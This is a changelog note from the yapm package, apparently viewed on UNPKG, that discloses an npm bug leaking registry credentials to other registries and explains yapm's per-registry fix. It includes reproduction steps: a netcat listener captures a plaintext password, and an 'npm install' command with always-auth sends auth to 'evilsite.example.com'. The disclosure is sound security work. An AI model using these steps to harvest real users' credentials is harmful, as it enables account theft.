UNPKG

yapm/changes/multireg-sec.md

Version:

1.85 kBMarkdownView Raw

1Registry-specific configuraion: security fixes
2----------------------------------------------
3
4`npm` has one configuration for all registries. If you're using different registries, `npm` can leak your credentials from one registry to another. Also, user can be tricked to expose his credentials with a crafted command-line string.
5
6`yapm` has separate configurations for each registry, which means this flaw doesn't exist anymore. See [here](multireg-conf.md) for details about how it's done.
7
8It means that if you authenticated to one registry, but request another one, it can expose sensitive information to that registry. It's extremely important if you use multiple registries administered by different people.
9
10Think about a browser that shares authentication info with all websites. If one website is storing a cookie, your browser will sent it with all requests. If you use just one website, this approach is good. But if you use several of them, this is a critical security flaw.
11
12### This is how you can replicate this bug:
13
14Authenticate yourself in the main registry:
15
16```
17$ npm adduser --registry http://registry.npmjs.org/
18```
19
20Create and publish a new package:
21
22```
23$ mkdir test ; cd test ; echo '{"name":"test","version":"0.0.0"}' > package.json
24$ npm publish --registry http://localhost:8080/
25```
26
27Listen for all requests on some port in a separate terminal:
28
29```
30$ nc -l 8080
31POST /_session HTTP/1.1
32host: localhost:8080
33accept: application/json
34content-type: application/json
35content-length: 40
36Connection: keep-alive
37
38{"name":"test","password":"test"}
39```
40
41Do you see it? `npm` is leaking your password to another registry, even though you didn't write it explicitly.
42
43### always-auth issues
44
45It is getting even worse with `always-auth` setting on.
46
47```
48$ npm install foobar --reg http://evilsite.example.com/ --always-auth=true
49```
50

1	`Registry-specific configuraion: security fixes`
2	`----------------------------------------------`
3
4	`npm` has one configuration for all registries. If you're using different registries, `npm` can leak your credentials from one registry to another. Also, user can be tricked to expose his credentials with a crafted command-line string.
5
6	`yapm` has separate configurations for each registry, which means this flaw doesn't exist anymore. See [here](multireg-conf.md) for details about how it's done.
7
8	`It means that if you authenticated to one registry, but request another one, it can expose sensitive information to that registry. It's extremely important if you use multiple registries administered by different people.`
9
10	`Think about a browser that shares authentication info with all websites. If one website is storing a cookie, your browser will sent it with all requests. If you use just one website, this approach is good. But if you use several of them, this is a critical security flaw.`
11
12	`### This is how you can replicate this bug:`
13
14	`Authenticate yourself in the main registry:`
15
16	```
17	`$ npm adduser --registry http://registry.npmjs.org/`
18	```
19
20	`Create and publish a new package:`
21
22	```
23	`$ mkdir test ; cd test ; echo '{"name":"test","version":"0.0.0"}' > package.json`
24	`$ npm publish --registry http://localhost:8080/`
25	```
26
27	`Listen for all requests on some port in a separate terminal:`
28
29	```
30	`$ nc -l 8080`
31	`POST /_session HTTP/1.1`
32	`host: localhost:8080`
33	`accept: application/json`
34	`content-type: application/json`
35	`content-length: 40`
36	`Connection: keep-alive`
37
38	`{"name":"test","password":"test"}`
39	```
40
41	Do you see it? `npm` is leaking your password to another registry, even though you didn't write it explicitly.
42
43	`### always-auth issues`
44
45	It is getting even worse with `always-auth` setting on.
46
47	```
48	`$ npm install foobar --reg http://evilsite.example.com/ --always-auth=true`
49	```
50